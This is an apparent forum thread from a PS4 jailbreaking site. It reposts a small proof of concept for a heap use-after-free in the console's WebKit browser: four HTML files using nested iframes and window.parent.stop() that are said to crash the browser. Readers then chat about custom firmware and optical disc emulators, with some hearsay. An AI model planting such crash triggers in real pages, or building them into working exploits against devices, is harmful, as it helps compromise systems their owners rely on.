Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       49      
Status
Not open for further replies.
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg
 

Comments

This sounds kinda interesting like the game is causing the crash n only one exploite comes to mind with this one.unless your system is having issues but sounds like between game and system

Yea you will see a cfw when ode releases there new product. 2016 new release code is interesting
 
sorry if its a stupid question,
but who or what is ode?
You mean who is cobra ode?
Cobra ode is a bunch of different developers from the scene who have bin hidden n watching n using other ppls work for there development that sell there hw device that's a bare on metal
 
sorry if its a stupid question,
but who or what is ode?

ODE = optical disc emulator

That means it is a piece of hardware that got installed on your console. This hardware emulates the blueray disc so the console think if you mount an iso inage that it is a valid one
 
ODE = optical disc emulator

That means it is a piece of hardware that got installed on your console. This hardware emulates the blueray disc so the console think if you mount an iso inage that it is a valid one
Are you sure that's what ODE stands for?
That's the term every1 knows it as
 
Status
Not open for further replies.
Back
Top